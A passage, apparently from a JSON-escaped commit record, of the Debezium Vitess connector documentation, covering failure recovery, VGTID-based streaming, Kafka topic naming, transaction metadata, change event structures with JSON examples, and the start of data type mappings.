processes.\n\n[id=\"vitess-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf the Kafka Connect process stops unexpectedly, any connector tasks it was running terminate without recording their most recently processed offsets. When Kafka Connect is being run in distributed mode, Kafka Connect restarts those connector tasks on other processes. However, Vitess connectors resume from the last offset that was _recorded_ by the earlier processes. This means that the new replacement tasks might generate some of the same change events that were processed just prior to the crash. 
The number of duplicate events depends on the offset flush period and the volume of data changes just before the crash.\n\nBecause there is a chance that some events might be duplicated during a recovery from failure, consumers should always anticipate some duplicate events. {prodname} changes are idempotent, so a sequence of events always results in the same state.\n\nIn each change event record, {prodname} connectors insert source-specific information about the origin of the event, including the Vitess server's time of the event and the position in the binlog where the transaction changes were written. Consumers can keep track of this information, especially the VGTID, to determine whether an event is a duplicate.\n\n[id=\"vitess-kafka-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nAs the connector generates change events, the Kafka Connect framework records those events in Kafka by using the Kafka producer API. Periodically, at a frequency that you specify in the Kafka Connect configuration, Kafka Connect records the latest offset that appears in those change events. If the Kafka brokers become unavailable, the Kafka Connect process that is running the connectors repeatedly tries to reconnect to the Kafka brokers. In other words, the connector tasks pause until a connection can be re-established, at which point the connectors resume exactly where they left off.\n\n[id=\"vitess-connector-is-stopped-for-a-duration\"]\n=== Connector is stopped for a duration\n\nIf the connector is gracefully stopped, the database can continue to be used. Any changes are recorded in the Vitess binlog. When the connector restarts, it resumes streaming changes where it left off. That is, it generates change event records for all database changes that were made while the connector was stopped.\n\nA properly configured Kafka cluster is able to handle massive throughput. Kafka Connect is written according to Kafka best practices, and given enough resources a Kafka Connect connector can also handle very large numbers of database change events. Because of this, after being stopped for a while, when a {prodname} connector restarts, it is very likely to catch up with the database changes that were made while it was stopped. How quickly this happens depends on the capabilities and performance of Kafka and the volume of changes being made to the data in Vitess.\n\n[id=\"limitations-with-earlier-vitess-versions\"]\n=== Limitations with earlier Vitess versions\n\n.Vitess 8.0.0\n\n* Due to a minor Vitess padding issue (which is fixed in Vitess 9.0.0), decimal values with a precision that is greater than or equal to 13 will cause extra whitespace in front of the number. For example, if the column type is `decimal(13,4)` in the table definition, the value `-1.2300` becomes `\"- 1.2300\"`, and the value `1.2300` becomes `\" 1.2300\"`.\n* Does not support the `JSON` column type.\n* VStream 8.0.0 doesn't provide additional metadata about the permitted values for `ENUM` columns.\nTherefore, the connector does not support the `ENUM` column type.\nThe index number (1-based) will be emitted instead of the enumeration value.\nFor example, 
`\"3\"` will be emitted as the value instead of `\"L\"` if the `ENUM` definition is `enum('S','M','L')`.\n","old_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-vitess\"]\n= {prodname} connector for Vitess\n:context: vitess\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n{prodname}'s Vitess connector captures row-level changes in the shards of a Vitess link:https:\/\/vitess.io\/docs\/concepts\/keyspace\/[keyspace].\nFor information about the Vitess versions that are compatible with this connector, see the link:https:\/\/debezium.io\/releases\/[{prodname} release overview].\n\nThe connector does not support snapshot feature at the moment. The first time it connects to a Vitess cluster, it starts from the current VGTID location of the keyspace and continuously captures row-level changes that insert, update, and delete database content and that were committed to a Vitess keyspace. The connector generates data change event records and streams them to Kafka topics. For each table, the default behavior is that the connector streams all generated events to a separate Kafka topic for that table. Applications and services consume data change event records from that topic.\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} Vitess connector\n\/\/ ModuleID: overview-of-debezium-vitess-connector\n[[vitess-overview]]\n== Overview\n\nVitess's link:https:\/\/vitess.io\/docs\/concepts\/vstream\/[VStream] feature was introduced in version 4.0. It is a change event subscription service that provides equivalent information to the MySQL binary logs from the underlying MySQL shards of the Vitess cluster. An user can subscribe to multiple shards in a keyspace, making it a convenient tool to feed downstream CDC processes.\n\nTo read and process database changes, the Vitess connector subscribes to link:https:\/\/vitess.io\/docs\/concepts\/vtgate\/[VTGate]'s VStream gRPC service. VTGate is a lightweight, stateless gRPC server, which is part of the Vitess cluster setup.\n\nThe connector gives you the flexibility to choose to subscribe to the `MASTER` nodes, or to the `REPLICA` nodes for change events.\n\nThe connector produces a change event for every row-level insert, update, and delete operation that was captured and sends change event records for each table in a separate Kafka topic. Client applications read the Kafka topics that correspond to the database tables of interest, and can react to every row-level event they receive from those topics.\n\nThe connector is tolerant of failures. As the connector reads changes and produces events, it records the VGTID position for each event. 
If the connector stops for any reason (including communication failures, network problems, or crashes), upon restart the connector continues reading the VStream where it last left off.\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-vitess-connectors-work\n\/\/ Title: How {prodname} Vitess connectors work\n[[how-the-vitess-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} Vitess connector, it is helpful to understand how the connector streams change events, determines Kafka topic names, and uses metadata.\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-vitess-connectors-stream-change-event-records\n\/\/ Title: How {prodname} Vitess connectors stream change event records\n[[vitess-streaming-changes]]\n=== Streaming changes\n\nThe Vitess connector spends all its time streaming changes from the VTGate's VStream gRPC service to which it is subscribed. The client receives changes from VStream as they are committed in the underlying MySQL server's binlog at certain positions, which are referred to as VGTID.\n\nThe VGTID in Vitess is the equivalent of the GTID in MySQL; it describes the position in the VStream in which a change event happens. Typically, a VGTID has multiple shard GTIDs; each shard GTID is a tuple of `(Keyspace, Shard, GTID)` that describes the GTID position of a given shard.\n\nWhen subscribing to a VStream service, the connector needs to provide a VGTID and a link:https:\/\/vitess.io\/docs\/concepts\/tablet\/#tablet-types[Tablet Type] (e.g. `MASTER`, `REPLICA`). The VGTID describes the position from which VStream should start sending change events; the tablet type describes the underlying MySQL instance (master or replica) in each shard from which the connector reads change events.\n\nThe first time the connector connects to a Vitess cluster, it gets the current VGTID from a Vitess component called link:https:\/\/vitess.io\/docs\/concepts\/vtctld\/[VTCtld] and provides the current VGTID to VStream.\n\nThe {prodname} Vitess connector acts as a gRPC client of VStream. When the connector receives changes, it transforms the events into {prodname} _create_, _update_, or _delete_ events that include the VGTID of the event. The Vitess connector forwards these change events in records to the Kafka Connect framework, which is running in the same process. The Kafka Connect process asynchronously writes the change event records in the same order in which they were generated to the appropriate Kafka topic.\n\nPeriodically, Kafka Connect records the most recent _offset_ in another Kafka topic. The offset indicates source-specific position information that {prodname} includes with each event. For the Vitess connector, the VGTID recorded in each change event is the offset.\n\nWhen Kafka Connect gracefully shuts down, it stops the connectors, flushes all event records to Kafka, and records the last offset received from each connector. When Kafka Connect restarts, it reads the last recorded offset for each connector, and starts each connector at its last recorded offset. When the connector restarts, it sends a request to VStream to send the events starting just after that position.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-vitess-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} Vitess change event records\n[[vitess-topic-names]]\n=== Topic names\n\nThe Vitess connector writes events for all insert, update, and delete operations on a single table to a single Kafka topic. 
By default, the Kafka topic name is _serverName_._keyspaceName_._tableName_ where:\n\n* _serverName_ is the logical name of the connector as specified with the `database.server.name` connector configuration property.\n* _keyspaceName_ is the name of the keyspace (a.k.a. database) where the operation occurred.\n* _tableName_ is the name of the database table in which the operation occurred.\n\nFor example, suppose that `fulfillment` is the logical server name in the configuration for a connector that is capturing changes in a Vitess installation that has a `commerce` keyspace that contains four tables: `products`, `products_on_hand`, `customers`, and `orders`. Regardless of how many shards the keyspace has, the connector would stream records to these four Kafka topics:\n\n* `fulfillment.commerce.products`\n* `fulfillment.commerce.products_on_hand`\n* `fulfillment.commerce.customers`\n* `fulfillment.commerce.orders`\n\n[[vitess-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich data change event messages.\n\n[NOTE]\n.Limits on when {prodname} receives transaction metadata\n====\n{prodname} registers and receives metadata only for transactions that occur after you deploy the connector.\nMetadata for transactions that occur before you deploy the connector is not available.\n====\n\n{prodname} generates transaction boundary events for the `BEGIN` and `END` delimiters in every transaction.\nTransaction boundary events contain the following fields:\n\n`status`:: `BEGIN` or `END`.\n`id`:: String representation of the unique transaction identifier.\n`event_count` (for `END` events):: Total number of events emitted by the transaction.\n`data_collections` (for `END` events):: An array of pairs of `data_collection` and `event_count` elements\nthat indicates the number of events that the connector emits for changes that originate from a data collection.\n\n.Example\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"[{\\\"keyspace\\\":\\\"test_unsharded_keyspace\\\",\\\"shard\\\":\\\"0\\\",\\\"gtid\\\":\\\"MySQL56\/e03ece6c-4c04-11ec-8e20-0242ac110004:1-37\\\"}]\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"[{\\\"keyspace\\\":\\\"test_unsharded_keyspace\\\",\\\"shard\\\":\\\"0\\\",\\\"gtid\\\":\\\"MySQL56\/e03ece6c-4c04-11ec-8e20-0242ac110004:1-37\\\"}]\",\n \"event_count\": 1,\n \"data_collections\": [\n {\n \"data_collection\": \"test_unsharded_keyspace.my_seq\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nUnless overridden via the xref:vitess-property-transaction-topic[`transaction.topic`] option,\nthe connector emits transaction events to the xref:vitess-property-database-server-name[`_<database.server.name>_`]`.transaction` topic.\n\n.Change data event enrichment\n\nWhen transaction metadata is enabled, the data message `Envelope` is enriched with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n* `id` - string representation of unique transaction identifier\n* `total_order` - absolute position of the event among all events generated by the transaction\n* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction\n\nFollowing is an example of a message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n 
\"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": 1637988245467,\n \"transaction\": {\n \"id\": \"[{\\\"keyspace\\\":\\\"test_unsharded_keyspace\\\",\\\"shard\\\":\\\"0\\\",\\\"gtid\\\":\\\"MySQL56\/e03ece6c-4c04-11ec-8e20-0242ac110004:1-68\\\"}]\",\n \"total_order\": 1,\n \"data_collection_order\": 1\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-vitess-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} Vitess connector data change events\n[[vitess-events]]\n== Data change events\n\nThe {prodname} Vitess connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the first single-column unique key if the table does not have a primary key, for the table that was changed. Multi-column unique key is not supported. +\n +\nIt is possible to override the table's primary key by setting the xref:vitess-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. 
It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\n\nThe default behavior is that the connector streams change event records to xref:vitess-topic-names[topics with names that are the same as the event's originating table].\n\n[NOTE]\n====\nStarting with Kafka 0.10, Kafka can optionally record the event key and value with the {link-kafka-docs}.html#upgrade_10_performance_impact[_timestamp_] at which the message was created (recorded by the producer) or written to the log by Kafka.\n====\n\n[WARNING]\n====\nThe Vitess connector ensures that all Kafka Connect schema names adhere to the http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the schema and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a schema name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\n[IMPORTANT]\n====\nThe connector currently does not allow column names with the `@` prefix. For example, `age` is a valid column name, and `@age` is not. The reason is that the Vitess vstreamer has a bug that can send events with anonymized column names (for example, the column name `age` is anonymized to `@1`). There is no easy way to differentiate between a legitimate column name with the `@` prefix and the Vitess bug. 
See more discussion link:https:\/\/vitess.slack.com\/archives\/C0PQY0PTK\/p1606817216038500[here].\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-vitess-change-events\n\/\/ Title: About keys in {prodname} Vitess change events\n[[vitess-change-events-key]]\n=== Change event keys\n\nFor a given table, the change event's key has a structure that contains a field for each column in the primary key of the table at the time the event was created.\n\nConsider a `customers` table defined in the `commerce` keyspace and the example of a change event key for that table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INT NOT NULL,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n PRIMARY KEY(id)\n);\n----\n\n.Example change event key\nIf the `database.server.name` connector configuration property has the value `Vitess_server`, every change event for the `customers` table while it has this definition has the same key structure, which in JSON looks like this:\n\n[source,json,indent=0]\n----\n {\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"name\": \"Vitess_server.commerce.customers.Key\", \/\/ <2>\n \"optional\": false, \/\/ <3>\n \"fields\": [ \/\/ <4>\n {\n \"name\": \"id\",\n \"index\": \"0\",\n \"schema\": {\n \"type\": \"INT32\",\n \"optional\": \"false\"\n }\n }\n ]\n },\n \"payload\": { \/\/ <5>\n \"id\": \"1\"\n },\n }\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`Vitess_server.commerce.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._keyspace-name_._table-name_.`Key`. In this example: +\n\n* `Vitess_server` is the name of the connector that generated this event. +\n* `commerce` is the keyspace that contains the table that was changed. +\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, index, and schema.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key contains a single `id` field whose value is `1`.\n\n|===\n\n[NOTE]\n====\nAlthough the `column.exclude.list` and `column.include.list` connector configuration properties allow you to capture only a subset of table columns, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary key, then the change event's key is null. The rows in a table without a primary key constraint cannot be uniquely identified.\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-vitess-change-events\n\/\/ Title: About values in {prodname} Vitess change events\n[[vitess-change-events-value]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. 
The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INT NOT NULL,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n PRIMARY KEY(id)\n);\n----\n\nThe emitted events for `UPDATE` and `DELETE` operations contain the previous values of all columns in the table.\n\n\/\/ Type: continue\n[[vitess-create-events]]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,options=\"nowrap\",indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"Vitess_server.commerce.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"Vitess_server.commerce.customers.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"vgtid\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.vitess.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"Vitess_server.commerce.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"id\": 1,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"vitess\",\n \"name\": \"my_sharded_connector\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": true,\n \"db\": \"\",\n \"keyspace\": 
\"commerce\",\n \"table\": \"customers\",\n \"vgtid\": \"[{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"80-\\\",\\\"gtid\\\":\\\"MariaDB\/0-54610504-47\\\"},{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"-80\\\",\\\"gtid\\\":\\\"MariaDB\/0-1592148-45\\\"}]\"\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559033904863 \/\/ <10>\n }\n}\n----\n\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`Vitess_server.commerce.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._keyspaceName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the xref:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.vitess.Source` is the schema for the payload's `source` field. This schema is specific to the Vitess connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`Vitess_server.commerce.customers.Envelope` is the schema for the overall structure of the payload, where `Vitess_server` is the connector name, `commerce` is the keyspace, and `customers` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the xref:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\na|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|8\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database (a.k.a keyspace) and table that contains the new row\n* If the event was part of a snapshot\n* Offset of the operation in the database binlog\n* Timestamp for when the change was made in the database\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. 
Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n\n|10\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n\/\/ Type: continue\n[[vitess-update-events]]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": { \/\/ <2>\n \"id\": 1,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"vitess\",\n \"name\": \"my_sharded_connector\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": null,\n \"db\": \"\",\n \"keyspace\": \"commerce\",\n \"table\": \"customers\",\n \"vgtid\": \"[{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"80-\\\",\\\"gtid\\\":\\\"MariaDB\/0-54610504-47\\\"},{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"-80\\\",\\\"gtid\\\":\\\"MariaDB\/0-1592148-46\\\"}]\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1465584025523 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that contains all values of all columns that were in the row before the database commit.\n\n|2\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `first_name` value is now `Anne Marie`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database (a.k.a keyspace) and table that contains the new row\n* If the event was part of a snapshot\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. 
By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a xref:vitess-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section.\n====\n\n[[vitess-delete-events]]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"vitess\",\n \"name\": \"my_sharded_connector\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": null,\n \"db\": \"\",\n \"keyspace\": \"commerce\",\n \"table\": \"customers\",\n \"vgtid\": \"[{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"80-\\\",\\\"gtid\\\":\\\"MariaDB\/0-54610504-47\\\"},{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"-80\\\",\\\"gtid\\\":\\\"MariaDB\/0-1592148-47\\\"}]\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n|Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `vgtid` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Database (a.k.a keyspace) and table that contains the new row\n* If the event was part of a snapshot\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. 
By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row.\n\nVitess connector events are designed to work with link:{link-kafka-docs}#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n\/\/ Type: continue\n[[vitess-tombstone-events]]\n.Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, the Vitess connector follows a _delete_ event with a special _tombstone_ event that has the same key but a `null` value.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-vitess-connectors-map-data-types\n\/\/ Title: How {prodname} Vitess connectors map data types\n[[vitess-data-types]]\n== Data type mappings\n\nThe Vitess connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the Vitess data type of the column. This section describes these mappings.\n\n[id=\"vitess-basic-types\"]\n=== Basic types\n\nThe following table describes how the connector maps basic Vitess data types to a _literal type_ and a _semantic type_ in event fields.\n\n* _literal type_ describes how the value is literally represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\n\n* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\n.Mappings for Vitess basic data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Vitess data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`BOOLEAN, 